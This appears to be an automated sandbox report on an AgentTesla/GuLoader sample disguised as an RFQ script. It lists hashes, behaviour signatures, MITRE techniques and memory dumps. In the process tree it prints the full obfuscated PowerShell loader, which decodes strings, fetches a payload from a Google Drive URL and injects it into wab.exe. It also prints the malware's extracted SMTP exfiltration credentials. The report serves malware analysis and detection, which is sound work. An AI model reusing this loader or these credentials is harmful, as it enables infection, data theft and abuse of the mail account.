agenttesla | cd701adeeddc4cb8034b9b37b570fb777ef2e43919364881fea72800f8ce89c5

Analysis

max time kernel
146s
max time network
135s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27/03/2024, 06:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQ20240326_Lista commerciale.vbs
Size

39KB
MD5

57677b0b418974ecaa2bbce0a1307751
SHA1

e6201e191e4b52eb11eb94436d5f2a3b156e447e
SHA256

cd701adeeddc4cb8034b9b37b570fb777ef2e43919364881fea72800f8ce89c5
SHA512

1c7b4658b1e675608c8c8e020320a55c2429506246b3e36bad54e4d88cf47c186b6e894c83bceedfb846fdd137f5405f8e9c43375beb89a61e41ed3795951a14
SSDEEP

768:u05gBt/WAZGc8NnKwiQTdQUn2DoEx2E198Dbk:S1qNnKwKUwoEx2u9l

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.inkomech.com
Port:
587
Username:
[email protected]
Password:
Amir@2021

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.inkomech.com
Port:
587
Username:
[email protected]
Password:
Amir@2021
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
11	drive.google.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	api.ipify.org
17	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
768	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2464	powershell.exe
768	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2464 set thread context of 768	2464	powershell.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1356	powershell.exe
2464	powershell.exe
2464	powershell.exe
768	wab.exe
768	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2464	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	768	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2000 wrote to memory of 1356	2000	WScript.exe	28
PID 2000 wrote to memory of 1356	2000	WScript.exe	28
PID 2000 wrote to memory of 1356	2000	WScript.exe	28
PID 1356 wrote to memory of 2636	1356	powershell.exe	30
PID 1356 wrote to memory of 2636	1356	powershell.exe	30
PID 1356 wrote to memory of 2636	1356	powershell.exe	30
PID 1356 wrote to memory of 2464	1356	powershell.exe	32
PID 1356 wrote to memory of 2464	1356	powershell.exe	32
PID 1356 wrote to memory of 2464	1356	powershell.exe	32
PID 1356 wrote to memory of 2464	1356	powershell.exe	32
PID 2464 wrote to memory of 2492	2464	powershell.exe	33
PID 2464 wrote to memory of 2492	2464	powershell.exe	33
PID 2464 wrote to memory of 2492	2464	powershell.exe	33
PID 2464 wrote to memory of 2492	2464	powershell.exe	33
PID 2464 wrote to memory of 768	2464	powershell.exe	36
PID 2464 wrote to memory of 768	2464	powershell.exe	36
PID 2464 wrote to memory of 768	2464	powershell.exe	36
PID 2464 wrote to memory of 768	2464	powershell.exe	36
PID 2464 wrote to memory of 768	2464	powershell.exe	36
PID 2464 wrote to memory of 768	2464	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ20240326_Lista commerciale.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spisningers Statsoverhovederne Glosebog #>;$Expensing=(cmd /c set /A 115^^0);Function Unaccompanied ([String]$Demihag){$Carbons=[char][int]$Expensing+'ubstring';$Oriya=8;$Redward160=Eddikebryggere($Demihag);For($Optimistjolle=7; $Optimistjolle -lt $Redward160; $Optimistjolle+=$Oriya){$Overweighing=$Demihag.$Carbons.Invoke($Optimistjolle, 1);$Subicterical=$Subicterical+$Overweighing;}$Subicterical;}function Eurohring ($Disaccharidase){. ($Matterate) ($Disaccharidase);}function Eddikebryggere ([String]$Yemenittisk147){$Sparrowless=$Yemenittisk147.Length-1;$Sparrowless;}$Puffier=Unaccompanied 'Ret,eskT Ijnesprsla,maralegongsnMetricas d.tterf F,ontieStichoirCosm gerPlo.ghhitrimlesn.eskyttgSc.ldud ';$Shielings=Unaccompanied 'Pungarsh Emiss.tTolvtaltHeniquepForegivsTvetung:defence/T.ystsc/NedfrysdSpejderrcannesbiGrundigvForsknie R,vnem.FlugtsigclandesoBedirtbo,elkoragflattenlD.versieHermaet. IsomercparitetoAssistfmTampedc/ OverimuSjlelivcSt mmel? Skaalpe TitlenxUbetrygp Ekvi aoFo esairAggracetMateri =VideoapdKroatspoRetma,swSupr,henTemperal.nidafaoPers,naaCalendudOuthast& Grand.iPedicurd Epa,ch=Soci.lo1.nsinueF t awlc7 Impe,iwFloscul-.smansiOSoftwarQHighbingBrugerfrThi ste0folkebeLunapperO Canc eXHomacanOtremamdH CarideyFond kofSlalomeLHa.vorsZUegennyRKaplanuuRagedesDBab lone Nobbutn.yelets8Multilak P eventDispermO,knsomss ollineTHinknin8Bro yggktrapezimLicenti ';$Matterate=Unaccompanied ' Podietichondrae SeptenxSulphos ';$Viadukterne=Unaccompanied 'surfboa$GodsibigIsol.ekl El.egnoSam.ensbDreadnaaspoon.elIdeolog:MettestHFagvideo Unliebv Ulmusee ,arsebdPerturbpHjredelr maaredaNontranenonpropdYoghurtiLaciniokMuskatsa En ghetEuropea Aeth.l=Pateria LaevolSU.dercot.ransata,ardersrHubneritUmindel-VitiablBStimulaiAllogentAbon ems SubcosTTransatrReauditaRammedenA,dingtsClonicjfMordelleFd,varerCandeli Calip.a-Korru,tS Odontoo sn,kkeuspallinr Flovsec U,casueBrahman Tarmbla$Borg.rrS O hofthTrochilihavestue HovedblAccessiiE.eclannFlamboygUnse.nts Antiox Shantym- Unr maDStilebge BotnissMelanoptOpto,leiDe.ogatn Osmos aExpansitNationaiBlastidoReolpljnNonco s Silkwor$,iliondM IodochoBugspytdDegenereHordenslredundaf ConceslHeterolyIndertrvCladekne Fr tfurPalle.neConcita ';Eurohring (Unaccompanied 'An,rend$ F,ignigTraadvrlEdikteroBefr elbJag.gevaswonkenl Gasp,s: GrithbMcrucisoo,verexcd normioeKognitilUns,ottfreproa,lMetodisy Quake.v MaterieWindowirRundspre Filig =Foregan$Crys,aleSyn.aktnPr,thalvGl tino:Tv,ngsaaJillingpImpearlpRaasilkdUnsuperaMiscon,tUn ehavaO,taget ') ;Eurohring (Unaccompanied 'AftalegIMarketimMcelroypOver ntoOvervarr.ordfylt Bedrev-LarsensMRetranqo,orebygdF.oppenuImportulcockatieRaadere GurushiBOutt rni ,arteltKyskesnsPrim,geTGennemsrDecimala Pilfern Wrong s adsprefStandkveSousaforF rnedr ') ;$Modelflyvere=$Modelflyvere+'\Folketingssamlingen.Fak' ;Eurohring (Unaccompanied 'Resedae$osteitigAsfaltblSwa.smroKharou,bT.rninga UlvesklTilsmag:De,loccRSacrifieBefing,tFlsomm rGymnorha SluffecSkovltrkFlsk gge Fli.tedStatssk= traffe( Saar,aTInklineeSingrn.sOrdrebetGlom.re- ,ewindPParisthaSkrivektGl,mmebh icenti Mani.u$Ska nskM Act nooMidinetdUneffeneAktieskl LavkonfOutrol.lJabo,icyDalrendvF.atbree Surhedr A,risteBibliol)Sla der ') ;while (-not $Retracked) {Eurohring (Unaccompanied 'OrddeltI .isrhyfScott.f Arrogat(Jechode$ ,dviklH Rdb deo U.dispvSkriveseC.lcothdLainarepLimbuverTatouuraBromyriewarringd SwoonyiEl.sorhkLithocaaGladisstFyndigh.ModehusJ S.lthooGrundflbB bliotSStandartKedelsmaDutiabitsoapsude varter bac,bre-Swains,eAramaeaq onlose Hartadd$SuffixaP enaidu.dgangsf SemidofFarragoiAtriumgevveskytrCloset.)Filnumm Inhalat{IndagatSMethanat eblinga.lumpthrHovedngtSamelyd-ElefantSPleur.bl LokalpeVizslase vinterpS ickil Resched1Cyclant}Mrtler.eSpyetsnlFromfilsHastighePhloeot{G.nhuseSDisp,ratGirandoaGrn evrrOr onnatSp.ngob- AnkuseSBr,ndstlYongundeUn chine ProadmpTarsipe Wildne1 .nfrit;N tofraESelvr suMountanrInphas oBelg,erhBoglad,rKatapuliSlagtofnRaflebggTalosea R.efolk$FawnierVFremseniTrigo iaViscerod .uftaku FotohakIvrk ttt gu.steeEgaliserTen ismnOverskre M,dtag}Quadr,n ');Eurohring (Unaccompanied 'aaben a$Cricketg Ter.yslSymbasioEmhttehbPodendea Laa.eklIllight:DiamondR ProtoneObserv.tSecurigrG undslaPuljersc Pi,kenkSpritteeA.tegnedEjbritt=Buntmag(SkypumpT Chordoe Forspis krivept Sar.ng-Skinde.PP.aderuaRaakladtKommunehCoelent Ekspo,e$ BoligbMSelverkoAnsweredBarytpaeDramsholNuncupaf Ch oril S,ifniyindesluv.zimutheBetydnirBiblicaeMedicin)Unhisto ') ;}Eurohring (Unaccompanied 'S.rikke$BeskyttgBambustl unmanforaakremb Menne.aBr,bedslgenarch:Austau,BPelletieRittesbaBimles,rGu tiers Rydde.h .ledgeiS.gregapNet,rks idrang= gozell GaulthG Nedk.meFordkketGubbesd-KabelafCForsknioBoulevanj,mtlantFouriereYndigh,nStligertEk igib hetero$PjuskenMMesogasoHarangudPaataleePaygradl UnderwfYor,towlCraftsmy,tepninvDiddeste pl,codr MaggieeOrdklve ');Eurohring (Unaccompanied 'Le.emsb$Ka.alkagGaraucol anhalooUreglembHydropaabronkitl .egeta:AngustiPUdklassaEn orcirLa,desmcDataba eNonfraglPrawninhPhytoaluToddymas BirtinoColl ctmPepshovr Matri a,redninaType esdOrnamene RegisttFyrassi Peddlin=Forsi.k Feedwat[ SilkesSMetropoy.versils FiletetOvertase KlagebmMiljakt.BrneskoCKeckl sogaleenyn Skamr vAugerereTilhngerTantristBu,krin]Nebackh: A,lian:Re.tatiF ChristrCen.raloBefolknmJernsbeBM,sdanpaAl odiasSyn efueRegning6Forstrr4Se tipaSPrinsestKonstrurSlgt kaiStetisenBortledgHyg.ome(Travela$Strud.eB E.spaneUnf.rdaa IthacerBalleprs Mallorh TabouriStrandvp Fstni.)Snepper ');Eurohring (Unaccompanied ' Bagroo$SvejsetgDelgranl AdieusoTonki rbTrouserae.erbollUnpr.gr:S.gtshoSHoffourlSmlehovuunsurreksaleppekUbundeteCot.fulrdekla enEval,ereProklam Overtas=Krimina Achr m[Akk rdeS Te,minyAnstdelsNeuradytStran fe.orfrism Eremac. FattigTRreddameCabinetxFatuoustAutovrk.Ov.rlevEUntractnSmaglshc AmituloCoolh.ud,okumeniKatarern.nwieldgSie ens]Dyrekre:Te.eosa:ValsendATomatpuSLokalisCPol.ticISengetjI S enoc.Planl.nG Efterke,alepdatSerratiS atingstLakri sr Stt.eliHejs vrnTbsreadgforetrk(M.dkmpe$Pre,oncPForskriaklu,ketrFlerfa.cUnbruteeSilkeorltrimmedhN matodu Es opns Vrelseo,tavrerm affeprLiberataTorsdagaChr.tradUn,hougeLnforsktT olsep)Biltraf ');Eurohring (Unaccompanied 'Tweezer$DissevegSluffenl.eleensoDoctoribDrvlen,aBr msell Betegn: Cert.fP likkerhPanth,lofinnybetAkson,muPl.insfrpianettiFredsbeaHemicir= Hypern$UncrystSRac,etel WeightuSkannetkToogtyvk RegnskeRadiator Housewn Parap,eDabblin.instigasAbradanu .ougheb SkrppesAnstandt .rhverr BistaniSycaminnEjerskigSlvtjss(Regelre3R,endea6lacunos0 Pseudo1 Mois,u2Forbnp 0Splendr,Paaland3Carteli0.iperis6 Skrfni2Diamant7 Tjenes)Synchro ');Eurohring $Photuria;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c set /A 115^^0
    3⤵
    PID:2636
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Spisningers Statsoverhovederne Glosebog #>;$Expensing=(cmd /c set /A 115^^0);Function Unaccompanied ([String]$Demihag){$Carbons=[char][int]$Expensing+'ubstring';$Oriya=8;$Redward160=Eddikebryggere($Demihag);For($Optimistjolle=7; $Optimistjolle -lt $Redward160; $Optimistjolle+=$Oriya){$Overweighing=$Demihag.$Carbons.Invoke($Optimistjolle, 1);$Subicterical=$Subicterical+$Overweighing;}$Subicterical;}function Eurohring ($Disaccharidase){. ($Matterate) ($Disaccharidase);}function Eddikebryggere ([String]$Yemenittisk147){$Sparrowless=$Yemenittisk147.Length-1;$Sparrowless;}$Puffier=Unaccompanied 'Ret,eskT Ijnesprsla,maralegongsnMetricas d.tterf F,ontieStichoirCosm gerPlo.ghhitrimlesn.eskyttgSc.ldud ';$Shielings=Unaccompanied 'Pungarsh Emiss.tTolvtaltHeniquepForegivsTvetung:defence/T.ystsc/NedfrysdSpejderrcannesbiGrundigvForsknie R,vnem.FlugtsigclandesoBedirtbo,elkoragflattenlD.versieHermaet. IsomercparitetoAssistfmTampedc/ OverimuSjlelivcSt mmel? Skaalpe TitlenxUbetrygp Ekvi aoFo esairAggracetMateri =VideoapdKroatspoRetma,swSupr,henTemperal.nidafaoPers,naaCalendudOuthast& Grand.iPedicurd Epa,ch=Soci.lo1.nsinueF t awlc7 Impe,iwFloscul-.smansiOSoftwarQHighbingBrugerfrThi ste0folkebeLunapperO Canc eXHomacanOtremamdH CarideyFond kofSlalomeLHa.vorsZUegennyRKaplanuuRagedesDBab lone Nobbutn.yelets8Multilak P eventDispermO,knsomss ollineTHinknin8Bro yggktrapezimLicenti ';$Matterate=Unaccompanied ' Podietichondrae SeptenxSulphos ';$Viadukterne=Unaccompanied 'surfboa$GodsibigIsol.ekl El.egnoSam.ensbDreadnaaspoon.elIdeolog:MettestHFagvideo Unliebv Ulmusee ,arsebdPerturbpHjredelr maaredaNontranenonpropdYoghurtiLaciniokMuskatsa En ghetEuropea Aeth.l=Pateria LaevolSU.dercot.ransata,ardersrHubneritUmindel-VitiablBStimulaiAllogentAbon ems SubcosTTransatrReauditaRammedenA,dingtsClonicjfMordelleFd,varerCandeli Calip.a-Korru,tS Odontoo sn,kkeuspallinr Flovsec U,casueBrahman Tarmbla$Borg.rrS O hofthTrochilihavestue HovedblAccessiiE.eclannFlamboygUnse.nts Antiox Shantym- Unr maDStilebge BotnissMelanoptOpto,leiDe.ogatn Osmos aExpansitNationaiBlastidoReolpljnNonco s Silkwor$,iliondM IodochoBugspytdDegenereHordenslredundaf ConceslHeterolyIndertrvCladekne Fr tfurPalle.neConcita ';Eurohring (Unaccompanied 'An,rend$ F,ignigTraadvrlEdikteroBefr elbJag.gevaswonkenl Gasp,s: GrithbMcrucisoo,verexcd normioeKognitilUns,ottfreproa,lMetodisy Quake.v MaterieWindowirRundspre Filig =Foregan$Crys,aleSyn.aktnPr,thalvGl tino:Tv,ngsaaJillingpImpearlpRaasilkdUnsuperaMiscon,tUn ehavaO,taget ') ;Eurohring (Unaccompanied 'AftalegIMarketimMcelroypOver ntoOvervarr.ordfylt Bedrev-LarsensMRetranqo,orebygdF.oppenuImportulcockatieRaadere GurushiBOutt rni ,arteltKyskesnsPrim,geTGennemsrDecimala Pilfern Wrong s adsprefStandkveSousaforF rnedr ') ;$Modelflyvere=$Modelflyvere+'\Folketingssamlingen.Fak' ;Eurohring (Unaccompanied 'Resedae$osteitigAsfaltblSwa.smroKharou,bT.rninga UlvesklTilsmag:De,loccRSacrifieBefing,tFlsomm rGymnorha SluffecSkovltrkFlsk gge Fli.tedStatssk= traffe( Saar,aTInklineeSingrn.sOrdrebetGlom.re- ,ewindPParisthaSkrivektGl,mmebh icenti Mani.u$Ska nskM Act nooMidinetdUneffeneAktieskl LavkonfOutrol.lJabo,icyDalrendvF.atbree Surhedr A,risteBibliol)Sla der ') ;while (-not $Retracked) {Eurohring (Unaccompanied 'OrddeltI .isrhyfScott.f Arrogat(Jechode$ ,dviklH Rdb deo U.dispvSkriveseC.lcothdLainarepLimbuverTatouuraBromyriewarringd SwoonyiEl.sorhkLithocaaGladisstFyndigh.ModehusJ S.lthooGrundflbB bliotSStandartKedelsmaDutiabitsoapsude varter bac,bre-Swains,eAramaeaq onlose Hartadd$SuffixaP enaidu.dgangsf SemidofFarragoiAtriumgevveskytrCloset.)Filnumm Inhalat{IndagatSMethanat eblinga.lumpthrHovedngtSamelyd-ElefantSPleur.bl LokalpeVizslase vinterpS ickil Resched1Cyclant}Mrtler.eSpyetsnlFromfilsHastighePhloeot{G.nhuseSDisp,ratGirandoaGrn evrrOr onnatSp.ngob- AnkuseSBr,ndstlYongundeUn chine ProadmpTarsipe Wildne1 .nfrit;N tofraESelvr suMountanrInphas oBelg,erhBoglad,rKatapuliSlagtofnRaflebggTalosea R.efolk$FawnierVFremseniTrigo iaViscerod .uftaku FotohakIvrk ttt gu.steeEgaliserTen ismnOverskre M,dtag}Quadr,n ');Eurohring (Unaccompanied 'aaben a$Cricketg Ter.yslSymbasioEmhttehbPodendea Laa.eklIllight:DiamondR ProtoneObserv.tSecurigrG undslaPuljersc Pi,kenkSpritteeA.tegnedEjbritt=Buntmag(SkypumpT Chordoe Forspis krivept Sar.ng-Skinde.PP.aderuaRaakladtKommunehCoelent Ekspo,e$ BoligbMSelverkoAnsweredBarytpaeDramsholNuncupaf Ch oril S,ifniyindesluv.zimutheBetydnirBiblicaeMedicin)Unhisto ') ;}Eurohring (Unaccompanied 'S.rikke$BeskyttgBambustl unmanforaakremb Menne.aBr,bedslgenarch:Austau,BPelletieRittesbaBimles,rGu tiers Rydde.h .ledgeiS.gregapNet,rks idrang= gozell GaulthG Nedk.meFordkketGubbesd-KabelafCForsknioBoulevanj,mtlantFouriereYndigh,nStligertEk igib hetero$PjuskenMMesogasoHarangudPaataleePaygradl UnderwfYor,towlCraftsmy,tepninvDiddeste pl,codr MaggieeOrdklve ');Eurohring (Unaccompanied 'Le.emsb$Ka.alkagGaraucol anhalooUreglembHydropaabronkitl .egeta:AngustiPUdklassaEn orcirLa,desmcDataba eNonfraglPrawninhPhytoaluToddymas BirtinoColl ctmPepshovr Matri a,redninaType esdOrnamene RegisttFyrassi Peddlin=Forsi.k Feedwat[ SilkesSMetropoy.versils FiletetOvertase KlagebmMiljakt.BrneskoCKeckl sogaleenyn Skamr vAugerereTilhngerTantristBu,krin]Nebackh: A,lian:Re.tatiF ChristrCen.raloBefolknmJernsbeBM,sdanpaAl odiasSyn efueRegning6Forstrr4Se tipaSPrinsestKonstrurSlgt kaiStetisenBortledgHyg.ome(Travela$Strud.eB E.spaneUnf.rdaa IthacerBalleprs Mallorh TabouriStrandvp Fstni.)Snepper ');Eurohring (Unaccompanied ' Bagroo$SvejsetgDelgranl AdieusoTonki rbTrouserae.erbollUnpr.gr:S.gtshoSHoffourlSmlehovuunsurreksaleppekUbundeteCot.fulrdekla enEval,ereProklam Overtas=Krimina Achr m[Akk rdeS Te,minyAnstdelsNeuradytStran fe.orfrism Eremac. FattigTRreddameCabinetxFatuoustAutovrk.Ov.rlevEUntractnSmaglshc AmituloCoolh.ud,okumeniKatarern.nwieldgSie ens]Dyrekre:Te.eosa:ValsendATomatpuSLokalisCPol.ticISengetjI S enoc.Planl.nG Efterke,alepdatSerratiS atingstLakri sr Stt.eliHejs vrnTbsreadgforetrk(M.dkmpe$Pre,oncPForskriaklu,ketrFlerfa.cUnbruteeSilkeorltrimmedhN matodu Es opns Vrelseo,tavrerm affeprLiberataTorsdagaChr.tradUn,hougeLnforsktT olsep)Biltraf ');Eurohring (Unaccompanied 'Tweezer$DissevegSluffenl.eleensoDoctoribDrvlen,aBr msell Betegn: Cert.fP likkerhPanth,lofinnybetAkson,muPl.insfrpianettiFredsbeaHemicir= Hypern$UncrystSRac,etel WeightuSkannetkToogtyvk RegnskeRadiator Housewn Parap,eDabblin.instigasAbradanu .ougheb SkrppesAnstandt .rhverr BistaniSycaminnEjerskigSlvtjss(Regelre3R,endea6lacunos0 Pseudo1 Mois,u2Forbnp 0Splendr,Paaland3Carteli0.iperis6 Skrfni2Diamant7 Tjenes)Synchro ');Eurohring $Photuria;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2464
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c set /A 115^^0
      4⤵
      PID:2492
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1008a132ab69d738200ba0923b6fdc42

SHA1
88738b9bcb2408d2a55dca2e6bb39d7621029ac5

SHA256
f7ecd14bd96d6a1cff61286fe4af480bb69b171b4f95281f61feaf3c9258e067

SHA512
28f6ebe8e4223b4696c245a619a46f7af2e6c0d9dafc122a3f76243e7293af0781942feceeb2f080aeec509e81f8d7c8ad5ad613e98741c40abeff4d98a2c126

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3DEA.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UKJ4YGV3T5WLHRS8AWDT.temp

Filesize
7KB

MD5
ce7382950fe4a82c97830d3f6d577ef7

SHA1
a3de1e87281f2422134de8be59efff4c96e2454d

SHA256
560a429a6e1587669d2db76a66ec6ddee8d819b66f6e103f18265edd90fd745d

SHA512
522871b55533f3e8c5b3d6b29852b72439e878d1cfeeecb07f9802ee58d2b8c8085f0e38f9cb2dc23dd1dfdd3890567f8dcf76bbd52e9ce66952b6d3cf5cd929

Download Submit
memory/768-69-0x0000000001640000-0x00000000045A9000-memory.dmp

Filesize
47.4MB

Download
memory/768-51-0x0000000077436000-0x0000000077437000-memory.dmp

Filesize
4KB

Download
memory/768-50-0x0000000077400000-0x00000000774D6000-memory.dmp

Filesize
856KB

Download
memory/768-81-0x0000000022BF0000-0x0000000022C30000-memory.dmp

Filesize
256KB

Download
memory/768-47-0x0000000001640000-0x00000000045A9000-memory.dmp

Filesize
47.4MB

Download
memory/768-75-0x00000000005D0000-0x0000000001632000-memory.dmp

Filesize
16.4MB

Download
memory/768-79-0x00000000005D0000-0x0000000000612000-memory.dmp

Filesize
264KB

Download
memory/768-49-0x0000000077210000-0x00000000773B9000-memory.dmp

Filesize
1.7MB

Download
memory/768-80-0x000000006EC50000-0x000000006F33E000-memory.dmp

Filesize
6.9MB

Download
memory/768-86-0x0000000022BF0000-0x0000000022C30000-memory.dmp

Filesize
256KB

Download
memory/768-84-0x000000006EC50000-0x000000006F33E000-memory.dmp

Filesize
6.9MB

Download
memory/1356-11-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1356-35-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1356-30-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1356-31-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1356-32-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1356-4-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/1356-13-0x0000000002650000-0x0000000002662000-memory.dmp

Filesize
72KB

Download
memory/1356-29-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/1356-78-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/1356-12-0x000000001B660000-0x000000001B682000-memory.dmp

Filesize
136KB

Download
memory/1356-10-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1356-9-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1356-8-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/1356-7-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1356-5-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/1356-6-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/2464-16-0x0000000073250000-0x00000000737FB000-memory.dmp

Filesize
5.7MB

Download
memory/2464-46-0x0000000077400000-0x00000000774D6000-memory.dmp

Filesize
856KB

Download
memory/2464-48-0x00000000067E0000-0x0000000009749000-memory.dmp

Filesize
47.4MB

Download
memory/2464-45-0x00000000060E0000-0x00000000061E0000-memory.dmp

Filesize
1024KB

Download
memory/2464-44-0x0000000077210000-0x00000000773B9000-memory.dmp

Filesize
1.7MB

Download
memory/2464-42-0x0000000073250000-0x00000000737FB000-memory.dmp

Filesize
5.7MB

Download
memory/2464-41-0x0000000002560000-0x00000000025A0000-memory.dmp

Filesize
256KB

Download
memory/2464-39-0x00000000067E0000-0x0000000009749000-memory.dmp

Filesize
47.4MB

Download
memory/2464-38-0x0000000073250000-0x00000000737FB000-memory.dmp

Filesize
5.7MB

Download
memory/2464-37-0x00000000067E0000-0x0000000009749000-memory.dmp

Filesize
47.4MB

Download
memory/2464-77-0x00000000067E0000-0x0000000009749000-memory.dmp

Filesize
47.4MB

Download
memory/2464-36-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/2464-34-0x00000000060E0000-0x00000000061E0000-memory.dmp

Filesize
1024KB

Download
memory/2464-33-0x0000000002560000-0x00000000025A0000-memory.dmp

Filesize
256KB

Download
memory/2464-19-0x0000000002560000-0x00000000025A0000-memory.dmp

Filesize
256KB

Download
memory/2464-18-0x0000000073250000-0x00000000737FB000-memory.dmp

Filesize
5.7MB

Download
memory/2464-17-0x0000000002560000-0x00000000025A0000-memory.dmp

Filesize
256KB

Download